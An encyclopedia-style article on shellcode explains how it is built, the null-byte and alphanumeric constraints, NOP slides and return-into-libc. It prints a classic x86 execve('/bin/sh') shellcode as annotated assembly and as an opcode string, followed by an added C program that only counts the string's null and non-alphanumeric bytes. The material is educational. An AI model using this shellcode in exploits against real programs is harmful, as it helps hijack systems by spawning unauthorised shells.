Shellcode

from Wikipedia, the free encyclopedia

Shellcode is a programming term for a usually very small piece of assembler instructions assembled into opcodes (machine code) whose purpose is to manipulate a program or system, or to make it do something it was not intended to do. It frequently tries to start a shell, hence the name. Shellcodes have their origins in buffer overflow and other code injection attacks, but they are also used in software, especially in penetration tests, in experiments and in teaching.

Creating shellcodes

To create shellcode, the command to be executed can be written in C and translated with a compiler. The resulting program is then disassembled and its functionality reimplemented in assembly language; many instructions can be omitted or shortened. In many exploits the shellcode must not contain a null byte (0x00), because in C that byte marks the end of a string. Other constraints must often be satisfied as well: for example, only letters and digits may be allowed, or upper- and lower-case letters are converted, or particular offsets have to be hit, which can be achieved, for instance, by padding with more or less creative sequences of no-operation instructions (so-called NOP slides).

Instead of executing one's own code, which is not always possible (for example where memory protection is in use), one can also jump directly to suitable functions that already exist, for example in the program itself or in a loaded library such as libc. This technique is called return-into-libc.

Example

Local execve("/bin/sh") shellcode

The assembler code (x86 architecture):

void main() {
__asm__("
jmp 0x2a            # 2 bytes - jumps forward to the call, just before the string
popl %esi           # 1 byte - the address of the string is loaded into esi
movl %esi,0x8(%esi) # 3 bytes - the address of the string is written to memory (argv[0])
movb $0x0,0x7(%esi) # 4 bytes - the string is null-terminated
movl $0x0,0xc(%esi) # 7 bytes - a null pointer for the environment
movl $0xb,%eax      # 5 bytes - syscall number (execve) in eax
movl %esi,%ebx      # 2 bytes - ebx holds the address of "/bin/sh"
leal 0x8(%esi),%ecx # 3 bytes - arguments: a pointer to the string and a null pointer
leal 0xc(%esi),%edx # 3 bytes - environment
int $0x80           # 2 bytes - the interrupt is triggered
movl $0x1, %eax     # 5 bytes - syscall number (exit) in eax
movl $0x0, %ebx     # 5 bytes - exit status 0 is prepared
int $0x80           # 2 bytes - the interrupt is triggered
call -0x2f          # 5 bytes - a call back to popl, which pushes eip (the string address) onto the stack
.string \"/bin/sh\" # 8 bytes
");
}

The opcode string:

char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

However, this code is not very elegant: it contains null bytes and is rather long. To avoid "unwanted characters", encoders are often used; these mask such characters so that they can later be unmasked again, and may also compress the shellcode. There are also techniques other than a "jmp" or "call" for finding the address of the string. For example, one can simply push /bin/sh onto the stack; esp then contains its address.
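The two constraints discussed above (no null bytes, because C string functions stop at the first one; or, more strictly, letters and digits only) can be checked mechanically before a payload is ever used in a test. The following C program is an added example, not code from the article or from the phrack source it cites: it takes the article's own opcode string as input and reports its true length, the length a C string function would see, the number and first offset of null bytes, and how many bytes would fail an alphanumeric filter. The function names and the checker logic are mine.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Opcode string from the article: the execve("/bin/sh") shellcode plus the
 * compiler's function epilogue. It is the input under test here. */
static const char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

/* True length of the byte array: sizeof minus the NUL the compiler appends. */
size_t shellcode_len(void)
{
    return sizeof(shellcode) - 1;
}

/* Length as a C string function sees it: strlen() stops at the first embedded
 * \x00, which is exactly why null bytes break string-based injection. */
size_t shellcode_strlen(void)
{
    return strlen(shellcode);
}

/* Count how often `value` occurs in buf[0..len). */
size_t count_byte(const unsigned char *buf, size_t len, unsigned char value)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        if (buf[i] == value)
            n++;
    return n;
}

/* Offset of the first occurrence of `value`, or len if it does not occur. */
size_t find_byte(const unsigned char *buf, size_t len, unsigned char value)
{
    for (size_t i = 0; i < len; i++)
        if (buf[i] == value)
            return i;
    return len;
}

/* ASCII letters and digits only; deliberately locale-independent, unlike isalnum(). */
static int is_ascii_alnum(unsigned char c)
{
    return (c >= '0' && c <= '9') || (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z');
}

/* Count bytes that would be rejected by a "letters and digits only" filter. */
size_t count_non_alnum(const unsigned char *buf, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        if (!is_ascii_alnum(buf[i]))
            n++;
    return n;
}

int main(void)
{
    const unsigned char *p = (const unsigned char *)shellcode;
    size_t len = shellcode_len();

    printf("payload length:         %zu bytes\n", len);
    printf("strlen() sees:          %zu bytes\n", shellcode_strlen());
    printf("null bytes:             %zu, first at offset %zu\n",
           count_byte(p, len, 0x00), find_byte(p, len, 0x00));
    printf("non-alphanumeric bytes: %zu of %zu\n", count_non_alnum(p, len), len);
    return 0;
}
```

Running it shows the gap the article points out: the array is 61 bytes long, but strlen() reports only 9, because the first null byte (the immediate of movb $0x0,0x7(%esi)) sits at offset 9; 16 of the 61 bytes are null, and 51 of them would fail an alphanumeric filter.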

Literature

  • Jack Koziol: The Shellcoder's Handbook. Discovering and Exploiting Security Holes. Wiley, Indianapolis IN 2004, ISBN 0-7645-4468-3.
  • Jon Erickson: Forbidden Code. mitp, Bonn 2004, ISBN 3-8266-1457-7.

References

  1. Source: phrack.org (archived copy from February 11, 2008 in the Internet Archive)